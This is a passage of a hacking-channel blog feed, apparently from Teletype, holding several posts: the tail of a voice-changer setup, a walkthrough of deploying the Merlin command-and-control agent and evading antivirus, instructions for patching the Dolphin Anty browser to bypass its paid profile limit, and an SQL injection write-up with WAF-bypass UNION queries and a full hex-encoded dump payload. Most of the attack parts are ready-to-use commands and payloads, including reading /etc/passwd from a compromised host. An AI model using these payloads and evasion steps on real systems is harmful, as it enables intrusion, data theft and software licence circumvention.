  &lt;p id=&quot;Mrht&quot;&gt;&lt;strong&gt;IMPORTANT:&lt;/strong&gt; when installing the cable, it will set itself as the default audio output device, do not forget to change it back to your headphones, and also do not forget to put line 1 in the input device in the discord.&lt;/p&gt;
  &lt;p id=&quot;ULmc&quot;&gt;&lt;strong&gt;Interface&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;jxcO&quot;&gt;I have translated the interface into Russian for you (only what we need):&lt;/p&gt;
  &lt;figure id=&quot;O44T&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://lztcdn.com/files/8150b2de2cafff024a9f3967f7c86a836d43a27b7120a97351e46cb3f8faff9f.webp&quot; width=&quot;815&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;bTiz&quot;&gt;In Quality we set from &lt;strong&gt;192&lt;/strong&gt; to &lt;strong&gt;512&lt;/strong&gt; (there is no point higher), in bitrate we set &lt;strong&gt;4096.&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;MvJ3&quot;&gt;Set the key to +12 if you&amp;#x27;re testing a female voice model and -12 if you&amp;#x27;re testing a male one.&lt;/p&gt;
  &lt;p id=&quot;BsoK&quot;&gt;Next, click Start and profit. The voice model works!&lt;/p&gt;
  &lt;h4 id=&quot;That&amp;#x27;s-all.-good-fortune!&quot;&gt;That&amp;#x27;s all. good Luck!&lt;/h4&gt;

</content></entry><entry><id>hackfreaks:so7xRYd6jps</id><link rel="alternate" type="text/html" href="https://teletype.in/@hackfreaks/so7xRYd6jps?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hackfreaks"></link><title>How to bypass antivirus protection</title><published>2023-08-08T14:40:34.501Z</published><updated>2023-08-08T14:40:34.501Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img1.teletype.in/files/c2/ed/c2ed044a-ac72-4a04-b8aa-23232891405f.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://cdn.iguru.gr/files/2021/04/1-429.png&quot;&gt;Merlin is an HTTP/2 Command &amp; Control (C&amp;C) server for multi-platform Post exploitation written in Golang. Merlin is based on a client-server architecture and uses the HTTP/2 protocol for communication between server and host agents</summary><content type="html">
  &lt;p id=&quot;j3Kl&quot;&gt;Merlin is an HTTP/2 Command &amp;amp; Control (C&amp;amp;C) server for multi-platform Post exploitation written in Golang. Merlin is based on a client-server architecture and uses the HTTP/2 protocol for communication between server and host agents&lt;/p&gt;
  &lt;figure id=&quot;XUZz&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://cdn.iguru.gr/files/2021/04/1-429.png&quot; width=&quot;566&quot; /&gt;
    &lt;figcaption&gt;Figure 1 shows how Merlin can be used during a pentest.&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;h4 id=&quot;Security-Bypass-with-HTTP/2&quot;&gt;Security Bypass with HTTP/2&lt;/h4&gt;
  &lt;p id=&quot;8bo7&quot;&gt;By using the HTTP/2 protocol during Merlin connections, we achieve better network resource utilization and lower perception of latency by introducing header compression and allowing multiple concurrent communications on the connection itself. This new protocol has been validated against RFC7450 and can be seen as a way to solve some of the HTTP/1.x problems.&lt;/p&gt;
  &lt;p id=&quot;jAdW&quot;&gt;&lt;strong&gt;Since this is a new protocol, it will cause problems on IDS/IPS devices.&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;UxQX&quot;&gt;In short, existing tools are not equipped to or validate this protocol. Also, HTTP/2 is a binary protocol which makes it more compact, easy to parse and not user readable without using AV.&lt;/p&gt;
  &lt;p id=&quot;nZCn&quot;&gt;Today, security devices cannot understand the HTTP/2 protocol and are even able to decrypt network traffic for control. The combination of encryption and the lack of protocol support from inspection tools provides an excellent opportunity to avoid detection.&lt;/p&gt;
  &lt;p id=&quot;ILsw&quot;&gt;In this step, we will show how Merlin can be used to establish C&amp;amp;C communications during a pentest.&lt;/p&gt;
  &lt;p id=&quot;CIz1&quot;&gt;Let&amp;#x27;s start by downloading Merlin from the GitHub page. To do this, we need to enter the following command in our terminal. Please note that the Kali Linux distribution was used to run this wizard.&lt;/p&gt;
  &lt;blockquote id=&quot;Sukx&quot;&gt;git clone https://github.com/Ne0nd0g/merlin.git&lt;/blockquote&gt;
  &lt;p id=&quot;Dcye&quot;&gt;Next, you need to create an SSL certificate to use the encryption channel and establish connections between the server and host agents. The resulting files should be created in the &amp;quot;/data/x509&amp;quot; folder with the following command.&lt;/p&gt;
  &lt;figure id=&quot;ZwOJ&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/1d9f8f25a921d1c632bc5.png&quot; width=&quot;1307&quot; /&gt;
    &lt;figcaption&gt;Figure 2: Generate SSL key - Merlin server in &amp;quot;/data/x509&amp;quot; folder.&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;h4 id=&quot;Create-a-Linux-agent&quot;&gt;Create a Linux agent&lt;/h4&gt;
  &lt;p id=&quot;A2TO&quot;&gt;On the Merlin server side, Merlin must be running before the agents can be started. Use the following command:&lt;/p&gt;
  &lt;figure id=&quot;KI4z&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/efd65c23666bcb2b795bb.png&quot; width=&quot;888&quot; /&gt;
    &lt;figcaption&gt;Rice. 3. O. Merlin server running on localhost: 127.0.0.1:443.&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;WXjq&quot;&gt;After starting the Linux agent on the central target host, a new connection is made to the Merlin server. To start, you need to use the command, for example:&lt;/p&gt;
  &lt;ul id=&quot;0ZiZ&quot;&gt;
    &lt;li id=&quot;3vlu&quot;&gt;agent list - list of available agents&lt;/li&gt;
    &lt;li id=&quot;UcaH&quot;&gt;interact [id] - interaction with the specified agent&lt;/li&gt;
    &lt;li id=&quot;2FCA&quot;&gt;cmd cat /etc/passwd Download the contents of the passwd file located at /etc/passwd&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure id=&quot;huDC&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://cdn.iguru.gr/files/2021/04/4-257.png&quot; width=&quot;1485&quot; /&gt;
    &lt;figcaption&gt;Rice. 4: Merlin connection with Linux agent loaded from &amp;quot;/etc/passwd&amp;quot; file.&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;B8or&quot;&gt;In addition, other commands and modules can be used via the command help.&lt;/p&gt;
  &lt;figure id=&quot;aijL&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://cdn.iguru.gr/files/2021/04/5-242.png&quot; width=&quot;1812&quot; /&gt;
    &lt;figcaption&gt;Figure 5: Merlin units available.&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;sCfP&quot;&gt;Another interesting part of this tool is the ability to create agents for various operating system architectures. The custom-designed payload will then be built on the highly secure, updated Windows 10 operating system.&lt;/p&gt;
  &lt;p id=&quot;gbe1&quot;&gt;Performing a Windows Defender scan for this particular agent ( agent_windows.exe), we can verify that it was not detected.&lt;/p&gt;
  &lt;figure id=&quot;Moal&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://cdn.iguru.gr/files/2021/04/6-199.png&quot; width=&quot;948&quot; /&gt;
    &lt;figcaption&gt;Figure 6: O Merlin Agent for Windows bypasses Windows Defender.&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;XKM4&quot;&gt;In this case, the Merlin server must run with the following options: -i [local IP address] and -p [local port]. This data was encrypted with a binary system ( agent_windows.exe ).&lt;/p&gt;
  &lt;figure id=&quot;HKyr&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/e24e6e9891c6396da19cc.png&quot; width=&quot;876&quot; /&gt;
    &lt;figcaption&gt;Figure 7: Start the Merlin server with a specific IP port/port.&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;yXtw&quot;&gt;The payload avoids detection of its signature in Windows 10 with a fully updated Microsoft Windows Defender.&lt;/p&gt;
  &lt;p id=&quot;7e2L&quot;&gt;The agent will then be executed:&lt;/p&gt;
  &lt;figure id=&quot;km2j&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://cdn.iguru.gr/files/2021/04/8-170.png&quot; width=&quot;1358&quot; /&gt;
    &lt;figcaption&gt;Figure 8: O Agent Merlin was running a fully updated Windows 10 bypassing Windows Defender.&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;fXFf&quot;&gt;A new connection has been received on the Merlin server as shown below.&lt;/p&gt;
  &lt;p id=&quot;v3hh&quot;&gt;From here, a set of native Windows commands can be used via the cmd command and several modules such as gathering, mimikatz, sharphound, credential thieves and more.&lt;/p&gt;
  &lt;figure id=&quot;89QD&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://cdn.iguru.gr/files/2021/04/9-165.png&quot; width=&quot;1338&quot; /&gt;
    &lt;figcaption&gt;Figure 9: Merlin server interacting with the Windows agent.&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Iqwb&quot;&gt;&lt;strong&gt;Low AV detection rate.&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;2YCk&quot;&gt;After the tests were done, the sample was tested on VirusTotal and only 13 out of 68 AVS identified the Merlin agent as malicious.&lt;/p&gt;
  &lt;figure id=&quot;mkrP&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://cdn.iguru.gr/files/2021/04/10-157.png&quot; width=&quot;1681&quot; /&gt;
    &lt;figcaption&gt;Figure 10: Low detection rate of the Merlin agent on Windows, as shown in VirusTotal.&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Xkwd&quot;&gt;&lt;strong&gt;Which AV bypasses:&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;6H0N&quot;&gt;
    &lt;li id=&quot;f79r&quot;&gt;Windows Defender&lt;/li&gt;
    &lt;li id=&quot;9VIA&quot;&gt;Kaspersky&lt;/li&gt;
    &lt;li id=&quot;XUAO&quot;&gt;Malwarebytes&lt;/li&gt;
    &lt;li id=&quot;UvIa&quot;&gt;Silence&lt;/li&gt;
    &lt;li id=&quot;ACoD&quot;&gt;McAfee&lt;/li&gt;
    &lt;li id=&quot;9HO3&quot;&gt;Symantec&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure id=&quot;eS5q&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://cdn.iguru.gr/files/2021/04/11-151.png&quot; width=&quot;1152&quot; /&gt;
    &lt;figcaption&gt;Figure 11: AV bypassed by the Merlin agent.&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;5hNh&quot;&gt;Finally, Merlin is a cross-platform post-exploitation framework that uses HTTP/2 communication to avoid detection and bypass security devices and AV detection.&lt;/p&gt;
  &lt;p id=&quot;mWUW&quot;&gt;HTTP/2 is a relatively new protocol that breaks through Perfect Forward Secretary (PFS) encrypted packets. AV avoidance is achieved each time a new Merlin agent is created. Golang is a great tool with the ability to create standalone binaries in a single binary and has many features that make it a very powerful language. Another interesting detail is that it has been compiled to native code, so it has good performance and can bypass its detection because of that.&lt;/p&gt;
  &lt;p id=&quot;GSGv&quot;&gt;openssl req -x509 -newkey rsa:4096 -sha256 -nodes -keyout server.key -out server.crt -subj “/CN=infosecinstitute” -day 7&lt;/p&gt;
  &lt;p id=&quot;oRuY&quot;&gt;GOOS=linux GOARCH=amd64 go build -ldflags &amp;quot;-X main.url=https://127.0.0.1:443&amp;quot; -o agent_linux main.go&lt;/p&gt;
  &lt;p id=&quot;CV0y&quot;&gt;#run the agent on the target host&lt;/p&gt;
  &lt;p id=&quot;5bEu&quot;&gt;chmod + x agent_linux &amp;amp;&amp;amp; ./agent_linux&lt;/p&gt;
  &lt;p id=&quot;MvIh&quot;&gt;sudo go run cmd /merlinserver/main.go -i [ip-address]&lt;/p&gt;
  &lt;p id=&quot;Narx&quot;&gt;GOOS=windows GOARCH=amd64 go build -ldflags &amp;quot;-X main.url=https://192.168.0.165:8080&amp;quot; -o agent_windows.exe main.&lt;/p&gt;
  &lt;p id=&quot;hxuP&quot;&gt;go run cmd /merlinserver/main.go -i 192.168.0.165 -p 8080&lt;/p&gt;

</content></entry><entry><id>hackfreaks:hyYMVoDfNEY</id><link rel="alternate" type="text/html" href="https://teletype.in/@hackfreaks/hyYMVoDfNEY?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hackfreaks"></link><title>🦾 Bypass 10 profiles for free in the anti-detect browser.</title><published>2023-06-24T18:15:56.101Z</published><updated>2023-06-24T18:18:49.653Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img2.teletype.in/files/91/1f/911fae7f-c952-4503-9057-a61a3dd40144.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://telegra.ph/file/bba2782557d83fe2bd02a.png&quot;&gt;Today I will tell you how to use the Dolphn {anty} anti-detect browser with the ability to create more than 10 profiles absolutely for free. Method did not belong to me. All credits goes to it's author. ps : unknown or if you know comment in chats.</summary><content type="html">
  &lt;p id=&quot;nQTc&quot;&gt;Today I will tell you how to use the Dolphn {anty} anti-detect browser with the ability to create more than 10 profiles absolutely for free. Method did not belong to me. All credits goes to it&amp;#x27;s author. ps : unknown or if you know comment in chats.&lt;/p&gt;
  &lt;p id=&quot;SdLl&quot;&gt;For those who are not in the know, the antidetect browser allows you to create an infinite number of browser profiles (special accounts inside the browser) in a couple of clicks. Each profile will not be similar to the other and thus, the resources will see us as a unique user. In general, a must-have in the arsenal of any self-respecting abuser.&lt;/p&gt;
  &lt;figure id=&quot;CtHz&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/bba2782557d83fe2bd02a.png&quot; width=&quot;300&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;2uLh&quot;&gt;1. Follow the link (https://www.python.org/downloads/) and install &amp;quot;Python 3.11.2&amp;quot;;&lt;/p&gt;
  &lt;p id=&quot;eH88&quot;&gt;└ Be sure to check the box next to &amp;quot;Add python.exe to PATH&amp;quot;;&lt;/p&gt;
  &lt;p id=&quot;rTUv&quot;&gt;2. Follow the link (https://bit.ly/3slwxEt) and register a new account in &amp;quot;Dolphn{anty}&amp;quot; or use your old one;&lt;/p&gt;
  &lt;p id=&quot;sr6k&quot;&gt;3. Download the browser itself and install it;&lt;/p&gt;
  &lt;p id=&quot;z9jF&quot;&gt;4. Launch the browser and log in to the account, where there are no more than 9 profiles;&lt;/p&gt;
  &lt;p id=&quot;c5HT&quot;&gt;5. Follow the link (https://github.com/yagiraa/dolphin-free) and download the software, then extract it from the archive;&lt;/p&gt;
  &lt;p id=&quot;LvdX&quot;&gt;6. Copy the &amp;quot;app.asar&amp;quot; file (it is located in the &amp;quot;Files&amp;quot; folder), go to the folder with the installed browser (&amp;quot;*\Dolphin Anty\resources&amp;quot;) and paste the &amp;quot;app.asar&amp;quot; file there with the replacement&lt;/p&gt;
  &lt;figure id=&quot;WT3r&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/c1190f91de0f25eb51108.png&quot; width=&quot;1280&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;g1mb&quot;&gt;7. Press the key combination Win + R and enter &amp;quot;cmd&amp;quot; into the search engine;&lt;/p&gt;
  &lt;p id=&quot;mAdS&quot;&gt;8. Paste the following code into the command line&lt;/p&gt;
  &lt;figure id=&quot;c9tt&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/853c5a49c7113d6d2bfec.png&quot; width=&quot;1263&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Vnb7&quot;&gt;&amp;amp;&lt;/p&gt;
  &lt;figure id=&quot;XEkR&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/9677fafed90c99f0e42a9.png&quot; width=&quot;800&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;9dFz&quot;&gt;cd /d &amp;quot;path to script folder&amp;quot;&lt;/p&gt;
  &lt;p id=&quot;vdwY&quot;&gt;pip install -r requirements.txt&lt;/p&gt;
  &lt;p id=&quot;5ElP&quot;&gt;9. Without closing the console, write the script update command: &amp;quot;python.exe -m pip install --upgrade pip&amp;quot;&lt;/p&gt;
  &lt;figure id=&quot;NKQB&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/90d92c2bbf16047a13d9c.png&quot; width=&quot;695&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;pMgZ&quot;&gt;10. We return to the folder with the software and double-click on the &amp;quot;main, py&amp;quot; file to launch the script itself and the browser&lt;/p&gt;
  &lt;figure id=&quot;cpWZ&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/a3a453b2df08cea4d104a.png&quot; width=&quot;1280&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Yj5h&quot;&gt;└ If, when starting the browser, the script displays such purple inscriptions and &amp;quot;ERROR&amp;quot; at the beginning&lt;/p&gt;
  &lt;figure id=&quot;o7Qr&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/0c662ee3698c9b8cb3443.png&quot; width=&quot;974&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;9vOf&quot;&gt;, then it means you ran the script incorrectly, run the script strictly from the software folder;&lt;/p&gt;
  &lt;p id=&quot;hJuC&quot;&gt;11. Congratulations, you are amazing!&lt;/p&gt;
  &lt;p id=&quot;6Ftg&quot;&gt;give it a like👍 Anonymity to all ✌️&lt;/p&gt;

</content></entry><entry><id>hackfreaks:ZkLd7D_q52D</id><link rel="alternate" type="text/html" href="https://teletype.in/@hackfreaks/ZkLd7D_q52D?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hackfreaks"></link><title>Bypass to perform advanced SQL injection based on errors.</title><published>2023-06-21T17:08:29.821Z</published><updated>2023-06-21T17:13:04.479Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img2.teletype.in/files/dd/20/dd20cb45-5e47-40b7-a2e6-92773da237cb.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://telegra.ph/file/42f92652bbcd0785d1083.png&quot;&gt;Hello my little Freaks. Hackfreaks Here! Without Further ado let's jump Into the topic. Well During penetration testing, I came across a website that in this article I will call http://domain.com.</summary><content type="html">
  &lt;figure id=&quot;ZaUL&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/42f92652bbcd0785d1083.png&quot; width=&quot;1000&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;NX8z&quot;&gt;Hello my little Freaks. Hackfreaks Here! Without Further ado let&amp;#x27;s jump Into the topic. Well During penetration testing, I came across a website that in this article I will call &lt;code&gt;http://domain.com.&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;UbnQ&quot;&gt;Looking through the website, I didn&amp;#x27;t see any option, even though the website was built in PHP. I quit browsing and started using Google Dorking.&lt;/p&gt;
  &lt;h4 id=&quot;Google-Dorking-to-find-endpoints&quot;&gt;Google Dorking to find endpoints&lt;/h4&gt;
  &lt;p id=&quot;GPJz&quot;&gt;Using simple dork &lt;code&gt;inurl:http://domain.com&lt;/code&gt;, I was able to get some interesting endpoints:&lt;/p&gt;
  &lt;figure id=&quot;QCWo&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/164f73de86efbf22681ea.jpg&quot; width=&quot;778&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;dAZv&quot;&gt;Selected text on the image leads to an interesting point: &lt;code&gt;http://domain.com/REDACTED/news.php?id=13&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;Mzz5&quot;&gt;When opening the URL, I encountered a MySQL error. Even from Google dork output you can see it:&lt;/p&gt;
  &lt;p id=&quot;Q4aB&quot;&gt;&lt;code&gt;Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean give in … on line 27&lt;/code&gt;&lt;/p&gt;
  &lt;figure id=&quot;BvIm&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/88b421927abd1c2f710cd.jpg&quot; width=&quot;972&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;uvsz&quot;&gt;The error is very valuable to us, because we know that we can perform some logical queries. Let&amp;#x27;s start operating.&lt;/p&gt;
  &lt;h4 id=&quot;Website-behavior-analysis&quot;&gt;Website behavior analysis&lt;/h4&gt;
  &lt;p id=&quot;AEPY&quot;&gt;I tried a few basic queries to see how the site behaves. When entering an incorrect request, 2 errors are issued (1 which was by default and another which was caused by us).&lt;/p&gt;
  &lt;figure id=&quot;yBmH&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/2535bbd30d9238388f9c1.jpg&quot; width=&quot;953&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;wzPX&quot;&gt;So we know that if our request is correct, we only get 1 error message, otherwise we get 2 error messages. one more thing. If you like this then subs to our &lt;a href=&quot;https://t.me/+9ZtRfQpkD84zNzdh&quot; target=&quot;_blank&quot;&gt;Hackfreaks Official&lt;/a&gt; would be great&lt;a href=&quot;https://t.me/+9ZtRfQpkD84zNzdh&quot; target=&quot;_blank&quot;&gt;.&lt;/a&gt; Thanks to this valuable information (which took me time to figure out), let&amp;#x27;s get the number of columns with a query &lt;code&gt;ORDER BY&lt;/code&gt;. &lt;/p&gt;
  &lt;h4 id=&quot;Finding-the-number-of-columns-with-Boolean-+-ORDER-BY&quot;&gt;Finding the number of columns with Boolean + ORDER BY&lt;/h4&gt;
  &lt;p id=&quot;ktcN&quot;&gt;Since the server is expecting a boolean statement, I can use query &lt;code&gt;AND 0&lt;/code&gt;, but some other boolean queries can also be used:&lt;/p&gt;
  &lt;pre id=&quot;riFg&quot;&gt;AND null
AND 1
&lt;/pre&gt;
  &lt;p id=&quot;sZ6F&quot;&gt;Now let&amp;#x27;s add both a boolean string and a query to our query &lt;code&gt;ORDER BY&lt;/code&gt;. I always try to start by looking for a column with the number 1, because I am 100% sure that the site will not show any error.&lt;/p&gt;
  &lt;p id=&quot;mTSL&quot;&gt;&lt;code&gt;http://domain.com/REDACTED/news.php?id=13 AND 0 order by 1-- -&lt;/code&gt;&lt;/p&gt;
  &lt;figure id=&quot;OdNg&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/744f8ac9a4c5d6f6d72d7.jpg&quot; width=&quot;956&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;S68p&quot;&gt;We only get 1 error message (from the website, not from our request). Now that we know our query is correct, let&amp;#x27;s try increasing the number of columns by 1 until we get the second error.&lt;/p&gt;
  &lt;pre id=&quot;tj85&quot;&gt;?id=13 AND 0 order by 1-— - (shows 1 error)
?id=13 AND 0 order by 2 — — (shows 1 error)
?id=13 AND 0 order by 3-— — (shows 1 error)
?id=13 AND 0 order by 4-— — (shows 1 error)
?id=13 AND 0 order by 5-— — (shows 1 error)
?id=13 AND 0 order by 6-— — (shows 2 errors)
&lt;/pre&gt;
  &lt;p id=&quot;WNju&quot;&gt;The second error message appears when we try to find the 6th column. So this means the database only has 5 columns.&lt;/p&gt;
  &lt;pre id=&quot;F9r2&quot;&gt;?id=13 AND 0 order by 6-— —
&lt;/pre&gt;
  &lt;figure id=&quot;xpyx&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/c05fd61da2a099ac0a7cd.jpg&quot; width=&quot;962&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;oqRb&quot;&gt;Before proceeding, let&amp;#x27;s make sure once again that the database has 5 columns.&lt;/p&gt;
  &lt;pre id=&quot;tF0G&quot;&gt;?id=13 AND 0 order by 5-— —
&lt;/pre&gt;
  &lt;figure id=&quot;oJhK&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/fb3b1808121b4746b1f5c.jpg&quot; width=&quot;964&quot; /&gt;
  &lt;/figure&gt;
  &lt;h4 id=&quot;Traversing-the-WAF-and-Finding-a-Column-to-Dump&quot;&gt;Traversing the WAF and Finding a Column to Dump&lt;/h4&gt;
  &lt;p id=&quot;rhbF&quot;&gt;Now we are sure because we don&amp;#x27;t get the second error. It&amp;#x27;s time to find which of these 5 columns will allow us to get the data using a query &lt;code&gt;UNION SELECT&lt;/code&gt;.&lt;/p&gt;
  &lt;p id=&quot;yIet&quot;&gt;&lt;code&gt;http://domain.com/REDACTED/news.php?id=13 AND 0 union select 1,2,3,4,5-- -&lt;/code&gt;&lt;/p&gt;
  &lt;figure id=&quot;cV0V&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/8bbcf11e2eed82a1601ee.jpg&quot; width=&quot;1131&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;siqb&quot;&gt;However, our request was blocked by WAF, let&amp;#x27;s try to get around the ban. There are tons of UNION queries to bypass WAF, but what worked in this case was:&lt;/p&gt;
  &lt;p id=&quot;bm4d&quot;&gt;&lt;code&gt;http://domain.com/REDACTED/news.php?id=13 AND 0 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,3,4,5-- -&lt;/code&gt;&lt;/p&gt;
  &lt;figure id=&quot;HpYO&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/77e47b5e5ce378c3bfd44.jpg&quot; width=&quot;1496&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;rm5m&quot;&gt;We bypassed the WAF, however the number is not displayed. Because of this, we don&amp;#x27;t know which columns we are going to drop. I looked through the whole page but didn&amp;#x27;t find anything, so I decided to look through the source code.&lt;/p&gt;
  &lt;figure id=&quot;HpoQ&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/1dd2c80f62e8998560290.jpg&quot; width=&quot;1073&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;PLRs&quot;&gt;In the highlighted part, we see the numbers &lt;strong&gt;2 &lt;/strong&gt; and &lt;strong&gt;3.&lt;/strong&gt; Great, now we know that we should focus on these 2 columns. In this case, I&amp;#x27;ll try the second column.&lt;/p&gt;
  &lt;h3 id=&quot;Dump-all-data-from-second-column&quot;&gt;Dump all data from second column&lt;/h3&gt;
  &lt;h4 id=&quot;Finding-the-database-name&quot;&gt;Finding the database name&lt;/h4&gt;
  &lt;p id=&quot;3Kak&quot;&gt;With a query based, &lt;code&gt;UNION&lt;/code&gt;let&amp;#x27;s get the name of the database.&lt;/p&gt;
  &lt;p id=&quot;npJ2&quot;&gt;&lt;code&gt;http://domain.com/REDACTED/news.php?id=13 AND 0 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,database(),3,4,5-— -&lt;/code&gt;&lt;/p&gt;
  &lt;figure id=&quot;KTu1&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/6786e25008f43528b6e8e.jpg&quot; width=&quot;1114&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;3ncg&quot;&gt;Great, we see the name of the database.&lt;/p&gt;
  &lt;h4 id=&quot;Automatic-dump-of-tables-+-columns-with-DIOS&quot;&gt;Automatic dump of tables + columns with DIOS&lt;/h4&gt;
  &lt;p id=&quot;Els4&quot;&gt;I&amp;#x27;ll try to inject the DIOS payload because getting each column for each table by hand is very long and boring. The DIOS payload I used is specifically built for WAF traversal using &lt;code&gt;0xHEX&lt;/code&gt; transform and &lt;code&gt;/*!00000&lt;/code&gt;string traversal.&lt;/p&gt;
  &lt;p id=&quot;9GIH&quot;&gt;&lt;code&gt;http://domain.com/REDACTED/news.php?id=13 AND 0 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,/*!00000concat*/(0x3c666f6e7420666163653d224963656c616e6422207374796c653d22636f6c6f723a7265643b746578742d736861646f773a307078203170782035707820233030303b666f6e742d73697a653a33307078223e496e6a6563746564206279204468346e692056757070616c61203c2f666f6e743e3c62723e3c666f6e7420636f6c6f723d70696e6b2073697a653d353e44622056657273696f6e203a20,version(),0x3c62723e44622055736572203a20,user(),0x3c62723e3c62723e3c2f666f6e743e3c7461626c6520626f726465723d2231223e3c74686561643e3c74723e3c74683e44617461626173653c2f74683e3c74683e5461626c653c2f74683e3c74683e436f6c756d6e3c2f74683e3c2f74686561643e3c2f74723e3c74626f64793e,(select%20(@x)%20/*!00000from*/%20(select%20(@x:=0x00),(select%20(0)%20/*!00000from*/%20(information_schema/**/.columns)%20where%20(table_schema!=0x696e666f726d6174696f6e5f736368656d61)%20and%20(0x00)%20in%20(@x:=/*!00000concat*/(@x,0x3c74723e3c74643e3c666f6e7420636f6c6f723d7265642073697a653d333e266e6273703b266e6273703b266e6273703b,table_schema,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e266e6273703b266e6273703b266e6273703b,table_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75652073697a653d333e,column_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c2f74723e))))x)),3,4,5 -- -&lt;/code&gt;&lt;/p&gt;
  &lt;figure id=&quot;ibPe&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/019ce19d700e886c0dd55.jpg&quot; width=&quot;1381&quot; /&gt;
  &lt;/figure&gt;
  &lt;h4 id=&quot;Dump-data-inside-columns&quot;&gt;Dump data inside columns&lt;/h4&gt;
